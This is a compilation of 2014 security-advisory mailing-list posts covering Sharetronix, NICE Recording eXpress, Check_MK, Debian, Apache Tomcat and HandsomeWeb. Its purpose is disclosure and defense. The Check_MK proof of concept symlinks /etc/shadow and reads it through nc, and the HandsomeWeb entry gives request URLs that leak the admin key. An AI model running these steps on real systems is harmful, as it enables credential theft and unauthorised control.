Multiple vulnerabilities in Sharetronix
Advisory ID: HTB23214 Product: Sharetronix Vendor: Blogtronix, LLC Vulnerable Version(s): 3.3 and probably prior Tested Version: 3.3 Advisory Publication: May 7, 2014 [without technical details] Vendor Notification: May 7, 2014 Vendor Patch: May 27, 2014 Public Disclosure: May 28, 2014 Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352] CVE References: CVE-2014-3414, CVE-2014-3415 Risk Level: High CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Sharetronix, which can be exploited to perform SQL injection and Сross-Site Request Forgery (CSRF) attacks against vulnerable application. A remote hacker can gain full control over the application. 1) SQL Injection in Sharetronix: CVE-2014-3415 Input passed via the "invite_users[]" HTTP POST parameter to "/[group_name]/invite" URI is not properly sanitised before being used in SQL query. A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL commands in application's database. The following exploit code below creates a file "file.php" within the home directory of MySQL server with output of the "phpinfo()" PHP function in: http://[host]/[group_name]/invite"; method="post" name="main"> The attacker must be registered and logged-in (the registration is open by default). The attacker also must initially create a group (action allowed by default), in our example the group name is "group_name". 2) Сross-Site Request Forgery (CSRF) in Sharetronix: CVE-2014-3414 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to open a web page with CSRF exploit and grant administrative privileges to arbitrary existing user of the vulnerable application. The registration is open by default. The following CSRF exploit below grants administrative privileges to the user "username": http://[host]/admin/administrators"; method="post" name="main"> document.main.submit(); --- Solution: Update to Sharetronix 3.4 More Information: http://developer.sharetronix.com/download --- References: [1] High-Tech Bridge Advisory HTB23214 - https://www.htbridge.com/advisory/HTB23214 - Multiple vulnerabilities in Sharetronix. [2] Sharetronix - http://sharetronix.com/ - Sharetronix is a Secure Social Network for Your Company. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
SEC Consult SA-20140528-0 :: Root Backdoor & Unauthenticated access to voice recordings in NICE Recording eXpress
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140528-0 > === title: Root Backdoor & Unauthenticated access to voice recordings product: NICE Recording eXpress voice recording solution (formerly called Cybertech eXpress, Cybertech Myracle maybe affected too) vulnerable version: 6.0.x, 6.1.x, 6.2.x, 6.3.x, 6.5.x fixed version: see section "Solution" and "Timeline" below impact: critical homepage: http://www.nice.com found: 2013-11-13 by: Johannes Greil, Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor & product description: = "NICE Systems (NASDAQ: NICE), is the worldwide leader of intent-based solutions that capture and analyze interactions and transactions, realize intent, and extract and leverage insights to deliver impact in real time." source: http://www.nice.com/company-overview "NICE provides Law Enforcement Agencies (LEAs) with mission-critical lawful interception (LI) solutions to support the fight against organized crime, drug trafficking and terrorist activities. NICE helps LEAs stay up-to-date with fast-paced technology developments. The solutions retrieve target location, relations and conversation content from any type of communication including fax, fixed and mobile telephony, and Internet applications, resulting in a multi-dimensional investigative picture. NICE solutions support the entire lawful interception cycle, from warrant initiation to court evidence presentation." source: http://www.nice.com/lea "NICE Recording eXpress is designed specifically for the audio recording needs of the small and medium sized Public Safety organisation. This advanced recording solution offers a comprehensive, advanced, easy-to-install and affordable platform built for the Public Safety environment and Command and Control operations delivering optimal recording functionality and quality management." Source: http://www.nice.com/sites/default/files/nicerecordingexpress050112.pdf.pdf.pdf Business recommendation: Attackers are able to completely compromise the voice recording / surveillance solution as they can gain access to the system and database level and listen to recorded calls without prior authentication. Furthermore, attackers would be able to use the voice recording server as a jumphost for further attacks of the internal voice VLAN, depending on the network setup. It is highly recommended by SEC Consult not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. It is assumed that further critical vulnerabilities exist. Vulnerability overview/description: === Summary: 1) root backdoor account (REC-5180 SR1093984 - subtask REC-5424) 2) Unauthenticated access to sensitive files & voice recordings (REC-5179 SR1089608 - subtask REC-5417) 3) Low-privileged users can access other voice recordings & Insufficient authorization (REC-5179 SR1089608 - subtask REC-5418) 4) Unauthenticated access to functionality (REC-5179 SR1089608 - subtask REC-5419) 5) Insufficient authorization of admin functions (REC-5179 SR1089608 - subtask REC-5420) 6) Multiple cross site scripting issues (REC-5181 SR1093986 - subtask REC-5421) 7) Multiple unauthenticated SQL injection issues (REC-5180 SR1093984 - subtask REC-5423) 8) Insecure cookie handling (REC-5181 SR1093986 - subtask REC-5422) 9) Violation of least principle - services run as SYSTEM (not included in subtask) The strings in parenthesis of the vulnerability title are the official bug tracking number of NICE which is also referenced in their release notes. 1) root backdoor account (REC-5180 SR1093984 - subtask REC-5424) - -- The MySQL database table "usr" contains a "root" user with USRKEY / user id 1 with administrative access rights. This user account does NOT show up within the "user administration" menu when logged in as administrator user account in the web interface. Hence the password can't be changed there. As a side note: Password hashes are shown in the user administration menu for each user within HTML source code. 2) Unauthenticated access to sensitive files & voice recordings (REC-5179 SR1089608 - subtask REC-5417) - -- For example, unauthenticated attackers are able to gain access to e
LSE Leading Security Experts GmbH - LSE-2014-05-21 - Check_MK - Arbitrary File Disclosure Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 === LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 === Check_MK - Arbitrary File Disclosure Vulnerability - -- Affected Versions = Linux versions of Check_MK equal or greater than commit 7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1. Other platforms are not affected as the vulnerable feature is not implemented there. Issue Overview == Technical Risk: high Likelihood of Exploitation: high Vendor: Mathias Kettner GmbH Credits: LSE Leading Security Experts GmbH employees Markus Vervier and Sascha Kettler Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt Advisory Status: Public CVE-Number: CVE-2014-0243 Issue Description = While conducting a whitebox test LSE Leading Security Experts GmbH discovered that the Check_MK agent processes files from a directory with mode 1777. It is not checked if the files are symbolic or hard filesystem links. As the Check_MK agent runs with root permissions by default, it will read arbitrary files and readable devices with root permissions. The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200 in commit 7e9088c09963cb2e76030e8b645607692ec56011: <<>> commit 7e9088c09963cb2e76030e8b645607692ec56011 Author: Bernd Stroessenreuther Date: Thu Sep 5 15:49:46 2013 +0200 mk-job: /var/lib/check_mk_agent/job directory is now created with mode 1777 so mk-job can be used by unprivileged users too: fixing bug #1040 <<>> The vulnerable code in the agent for reading job results from "/var/lib/check_mk_agent/job" is: <<>> # Get statistics about monitored jobs if cd /var/lib/check_mk_agent/job; then echo '<<>>' head -n -0 -v * fi <<>> Impact == A local user may create a symbolic link in the directory "/var/lib/check_mk_agent/job", pointing to a file he normally would not have access to like "/etc/shadow". The agent expects output from jobs using the mk-job Tool in that directory. It will output the content of all files in the directory on TCP port 6556 by default. Temporary Workaround and Fix LSE Leading Security Experts GmbH advises to remove the write permissions and the sticky bit for non root users temporarily by setting mode 755 on the directory. Proof of Concept [myhost]$ pwd /var/lib/check_mk_agent/job [myhost]$ ls -l total 0 [myhost]$ ln -s /etc/shadow [myhost]$ ls -la total 4 drwxrwxrwt 2 root root4096 May 21 15:17 . drwxr-xr-x 3 root root4096 Feb 26 13:54 .. lrwxrwxrwx 1 myuser mygroup 11 May 21 15:17 shadow -> /etc/shadow [myhost]$ nc 127.0.0.1 6556 [...] <<>> ==> shadow <== root:$6$[...]:16133:0:9:7::: bin:*:15937:0:9:7::: daemon:*:15937:0:9:7::: adm:*:15937:0:9:7::: lp:*:15937:0:9:7::: sync:*:15937:0:9:7::: shutdown:*:15937:0:9:7::: halt:*:15937:0:9:7::: mail:*:15937:0:9:7::: uucp:*:15937:0:9:7::: operator:*:15937:0:9:7::: games:*:15937:0:9:7::: gopher:*:15937:0:9:7::: ftp:*:15937:0:9:7::: nobody:*:15937:0:9:7::: [...] History === 2014-05-20 Issue discovery 2014-05-21 Permission of customer for advisory 2014-05-21 Vendor informed 2014-05-22 CVE requested 2014-05-22 Vendor response 2014-05-22 CVE-2014-0243 assigned 2014-05-26 Official fix available 2014-05-27 Advisory release - -- http://www.lsexperts.de LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt Tel.: +49 (0) 6151 86086-0, Fax: -299, Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649 Geschäftsführer: Oliver Michel, Sven Walther -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (FreeBSD) iQIcBAEBAgAGBQJThYprAAoJEDgSCSGZ4yd8BgEP/07sJ4P4aByGKhCJmdmKo9+v IdGPSYWqWp2Y2iIuE0J8zIkss0SHwU6bFa27h5pIplqUNDFiu4ycOlCpUkx0yh/F z2DKxDGFQicegYHWj96Eagstj32P+vfo08yoLwxgC7vQawpbvTTM4edyunHUAuX9 r4Pb9Ia2OjFP+ePpP4Vp4HVHWEmO9kpEjm7irMvN+5Ft/fiMrrfafFXQk7/TO3Xr jGyx+l/Hw0znGUWgRVPicaztpD72ZhYwYy1AC5mltXniqVDxP3xWjJMGrtwl4bW4 o+GWTdOn9sEV8V+quvAz9SLCvmGCghaakJqKYmzVLVP4+2I3M6mcu2l/1pl6M5jE li+LScA9Fw6CwmUmk9gTduRTrHxcSWEzdRjrFll/Qh6DaU92YBTtfb5a7YCpFp+S 7Yf/ECA0BXTsfhY+M3CNUBSiJRCW6NQABIH/maOsK/u/Mq/gFcV0R/gd24YMIq1F GzNzZPmNmGlqaZHcMijgdnJ9MKKxA/qLlhV4fAULafNq0fGz+gnp2H/CoJCLogLd euJWtvcgqhOd5/m8O8YUi9pmyioHq7GNeN0oz+9MLurVKGZqilxCGaU1OLfSrwzx z72qzSt3txs8+s72LGDMcw0/OOx0KYm3xYekzkRyOs4JkDOSIATAhvhSTbdp2myX Kt8H8xrSmzdyUbTISR3E =rbLP -END PGP SIGNATURE-
[SECURITY] [DSA 2938-1] Availability of LTS support for Debian 6.0 / squeeze
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2938-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq - - The initial organisation and setup of Squeeze LTS has now happened and it is ready for taking over security support once the standard security support ends at the end of the month: Information for users = Support for Squeeze LTS will end five years after the release of Squeeze, i.e. until the 6th of February 2016. You need to enable the apt sources for squeeze-lts manually. Information on how to do this can be found at https://wiki.debian.org/LTS/Development#Add_squeeze-lts_to_your_sources.list You should also subscribe to the new annoucement mailing list for security updates for squeeze-lts: https://lists.debian.org/debian-lts-announce/ A few packages are not covered by the Squeeze LTS support. These can be detected with the new tool debian-security-support. Information on how to run it can be found here: https://wiki.debian.org/LTS/Development#Check_for_unsupported_packages If debian-security-support detects an unsupported package which is critical to you, please get in touch with debian-...@lists.debian.org (see below). squeeze-backports will continue to be supported for the lifetime of Squeeze LTS. Information for Debian maintainers == First of all, Debian package maintainers are not expected to work on updates of their packages for squeeze-lts. Package updates for squeeze-lts will be handled by the Debian LTS team. However, if you _are_ interested in doing so (and the maintainer always knows best on a package), you're certainly welcome to do so; everyone in the Debian.org and Debian maintainers key ring can upload to the squeeze-lts suite. Information on how to upload a fixed package can be found at https://wiki.debian.org/LTS/Development#Upload_Packages Mailing lists = The whole coordination of the Debian LTS effort is handled through the debian-lts mailing list: https://lists.debian.org/debian-lts/ Please subscribe or follow us via GMANE (gmane.linux.debian.devel.lts) Aside from the debian-lts-announce list, there's also a list for following all uploads in debian-lts: https://lists.debian.org/debian-lts-changes/ Security Tracker All information on the status of vulnerabilities (e.g. if the version in squeeze-lts happens to be unaffected while wheezy is affected) will be tracked in the Debian Security Tracker: http://security-tracker.debian.org If you happen to spot an error in the data, please see https://security-tracker.debian.org/tracker/data/report Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJThKRGAAoJEBDCk7bDfE42iCIQALY7814rCMM4ctvKLFbrFQy6 eYUBXob1PHKaYwf3ISZOAIVwqsFszvDfeLjI7gt0PN0HC6jpc5ephxbZDvk3jdVU +VNEnrTd8StHE/M+Cj2lC6Mh27h8jn1FeS1rVMbG1CYNa9wo6BiR5pENKPeuLG3M M54rrOCwtNQHFhbNrQ4m+RiOrQI62fTqGg1e0RXvBqXAdj4kc0dL9B9W4WUwhhtq yaxjJVtk5847fSn3DuQbi/SbumTuiOb7BUMWixfUAM9IMODVn/I8TNKTcsAZAmY7 3Vz8LXjYV43/zkw69t8G8lEjkXovv+H4mrvShbtEAojCjL9WS5DCZViyiFNrDxu9 KK9EkbYEuTHv8Evgd42RPHwjt5Kw8KXwOr4LRX856Ti0gQj4rDQrDAM4L3hyXXFc Gdhqa7VXSXX4TIS0zrrXkSZhG77zDvmQJibAtivMUafvU9BKx8Cc7tmJ5lxje6Sn TbGrM62Pgou7F7AlLGl96cOijT8afEm+U2YUdtNgnqR3Z7kUWOhVDi217nwZk61z Au7NwGmALtzbqlKArsWKK4JNKgUE1HrdgPGvKcsCFN5PlXK45u5HiQxH8jVjURIc QV/VjqXE3OK3wOkx5XKeUNxKO9RlHxqKbI12PxhsR6yiBbZjMwN+PV2XlvOZ6in3 n0jz78yJ4H8u+R7milPO =EG+m -END PGP SIGNATURE-
[SECURITY] [DSA 2937-1] mod-wsgi security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2937-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq - - Package: mod-wsgi CVE ID : CVE-2014-0240 CVE-2014-0242 Two security issues have been found in the Python WSGI adapter module for Apache: CVE-2014-0240 Robert Kisteleki discovered a potential privilege escalation in daemon mode. This is not exploitable with the kernel used in Debian 7.0/wheezy. CVE-2014-0242 Buck Golemon discovered that incorect memory handling could lead to information disclosure when processing Content-Type headers. For the oldstable distribution (squeeze), these problems have been fixed in version 3.3-2+deb6u1. For the stable distribution (wheezy), these problems have been fixed in version 3.3-4+deb7u1. For the testing distribution (jessie), these problems have been fixed in version 3.5-1. For the unstable distribution (sid), these problems have been fixed in version 3.5-1. We recommend that you upgrade your mod-wsgi packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJThKJYAAoJEBDCk7bDfE42pQAP/1timmRSoJfdYXoYM/3wCeTH CQGd9/4TmKeZc7bzWeaQfsLYfWgeicS+y3hPuZBMKdr4jX0r40AQ9j2zhiHG+WvM jkpiLfuhvPpRY45Umll4xwRdfORpAr2ZN/H8ebohBOF6PAY4XZfr4tl0AgzqLPc+ s9wvff5vlDI5QBWuqWpXm4NXKlRtANqeTlPK3fvJJecJn74shv1PHpRqAVZzUA4J KYaVrnIZFz5FQm8X2n+1VeAPaZb+UU/otqKdqkUit9lcld2nB6Zq1cqiFGO2sNVU zO3aIj/nsrCJwIS2+3GhNAbjVbh9nz1c3ZAg0WFBr0CbrIHrA7mLIuHW3XYfXPKS vF5JDxf6lnpRaJEEyoVUosm2fk3x/W8D91v4m1u92rgRSUF14nAv9XX745t8aZHn VhzwFCwbaZgy0R2GbThs6rdAkVcKWNucCCX6WrjuEbp0HHCq8yEw7nkjCGY3lMj7 kRB6wm6iRcDIQCmClbLys/7Oq952TV6kLEs9XpD+rsyrHalkxqU/IZOhjwznLE3r rCVZMrzlUPupgob2xnBc/688LnMIcq/UQkJCMqCHo7ER+lvVLoAc9o4yvMF76JSC ZrbromVm51ZMFRuFD6kDjQFxrYBYt/QVAGeRrGCHkES8nm8l0x2g0QS61KXBh8V9 y+bcSiwTu8URJpnL32Ub =wcoD -END PGP SIGNATURE-
Re: [SECURITY] CVE-2014-0099 Apache Tomcat information disclosure
CORRECTION: This is CVE-2014-0099 *NOT* -0097 Apologies for the typo On 27/05/2014 13:46, Mark Thomas wrote: > CVE-2014-0099 Information Disclosure > > Severity: Important > > Vendor: The Apache Software Foundation > > Versions Affected: > - Apache Tomcat 8.0.0-RC1 to 8.0.3 > - Apache Tomcat 7.0.0 to 7.0.52 > - Apache Tomcat 6.0.0 to 6.0.39 > > Description: > The code used to parse the request content length header did not check > for overflow in the result. This exposed a request smuggling > vulnerability when Tomcat was located behind a reverse proxy that > correctly processed the content length header. > > Mitigation: > Users of affected versions should apply one of the following mitigations > - Upgrade to Apache Tomcat 8.0.5 or later > (8.0.4 contains the fix but was not released) > - Upgrade to Apache Tomcat 7.0.53 or later > - Upgrade to Apache Tomcat 6.0.41 or later > (6.0.40 contains the fix but was not released) > > Credit: > A test case that demonstrated the parsing bug was sent to the Tomcat > security team but no context was provided. The security implications > were identified by the Tomcat security team . > > References: > [1] http://tomcat.apache.org/security-8.html > [2] http://tomcat.apache.org/security-7.html > [3] http://tomcat.apache.org/security-6.html > > - > To unsubscribe, e-mail: security-unsubscr...@tomcat.apache.org > For additional commands, e-mail: security-h...@tomcat.apache.org >
[SECURITY] CVE-2014-0119 Apache Tomcat information disclosure
CVE-2014-0119 Information Disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.5 - Apache Tomcat 7.0.0 to 7.0.53 - Apache Tomcat 6.0.0 to 6.0.39 Description: In limited circumstances it was possible for a malicious web application to replace the XML parsers used by Tomcat to process XSLTs for the default servlet, JSP documents, tag library descriptors (TLDs) and tag plugin configuration files. The injected XMl parser(s) could then bypass the limits imposed on XML external entities and/or have visibility of the XML files processed for other web applications deployed on the same Tomcat instance. Mitigation: Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat 8.0.8 or later (8.0.6 and 8.0.7 contain the fix but were not released) - Upgrade to Apache Tomcat 7.0.54 or later - Upgrade to Apache Tomcat 6.0.41 or later (6.0.40 contains the fix but was not released) Credit: This issue was identified by the Tomcat security team. References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html
CVE-2014-3445 - Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages
Vulnerability title: Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages CVE: CVE-2014-3445 Vendor: HandsomeWeb Product: SOS Webpages Affected version: 1.1.11 and earlier Fixed version: 1.1.12 Reported by: Freakyclown Details: The default setup allows an unauthenticated user to access administrative functions such as backing up of key files within the CMS. This is done by appending the following to a domain using the software affected. /backup.php?a=2&k=6f15afa1ac4edea0g145e884116334b7 Where "a" is the file number to back up and "k" is the MD5key used to authenticate the administrator, however if "k" does not match the correct key rather than disallowing the unauthenticated user to back up the file the service will provide the user with the correct key. For example: Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5 Using this new key in the url such as below: /backup.php?a=2&k=5f17aca1ae2edea0f145e884116371a5 Will allow the user to perform the backup of files. In addition to this the key is generated by the code: $backupkey=MD5 Making it trivial to decrypt the key provided above to gain the administrators password and gain further control over the site. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
[SECURITY] CVE-2014-0097 Apache Tomcat information disclosure
CVE-2014-0097 Information Disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: The code used to parse the request content length header did not check for overflow in the result. This exposed a request smuggling vulnerability when Tomcat was located behind a reverse proxy that correctly processed the content length header. Mitigation: Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat 8.0.5 or later (8.0.4 contains the fix but was not released) - Upgrade to Apache Tomcat 7.0.53 or later - Upgrade to Apache Tomcat 6.0.41 or later (6.0.40 contains the fix but was not released) Credit: A test case that demonstrated the parsing bug was sent to the Tomcat security team but no context was provided. The security implications were identified by the Tomcat security team . References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html
[SECURITY] CVE-2014-0095 Apache Tomcat denial of service
CVE-2014-0095 Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC2 to 8.0.3 Description: A regression was introduced in revision 1519838 that caused AJP requests to hang if an explicit content length of zero was set on the request. The hanging request consumed a request processing thread which could lead to a denial of service. Mitigation: Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat 8.0.5 or later (8.0.4 contains the fix but was not released) Credit: This issue was reported as a possible bug via the Tomcat users mailing list and the security implications were identified by theTomcat security team. References: [1] http://tomcat.apache.org/security-8.html
[SECURITY] CVE-2014-0096 Apache Tomcat information disclosure
CVE-2014-0096 Information Disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: The default servlet allows web applications to define (at multiple levels) an XSLT to be used to format a directory listing. When running under a security manager, the processing of these was not subject to the same constraints as the web application. This enabled a malicious web application to bypass the file access constraints imposed by the security manager via the use of external XML entities. Mitigation: Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat 8.0.5 or later (8.0.4 contains the fix but was not released) - Upgrade to Apache Tomcat 7.0.53 or later - Upgrade to Apache Tomcat 6.0.41 or later (6.0.40 contains the fix but was not released) Credit: This issue was identified by the Tomcat security team. References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html
[SECURITY] CVE-2014-0075 Apache Tomcat denial of service
CVE-2014-0075 Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: It was possible to craft a malformed chunk size as part of a chucked request that enabled an unlimited amount of data to be streamed to the server, bypassing the various size limits enforced on a request. This enabled a denial of service attack. Mitigation: Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat 8.0.5 or later (8.0.4 contains the fix but was not released) - Upgrade to Apache Tomcat 7.0.53 or later - Upgrade to Apache Tomcat 6.0.41 or later (6.0.40 contains the fix but was not released) Credit: This issue was reported to the Tomcat security team by David Jorm of the Red Hat Security Response Team. References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html
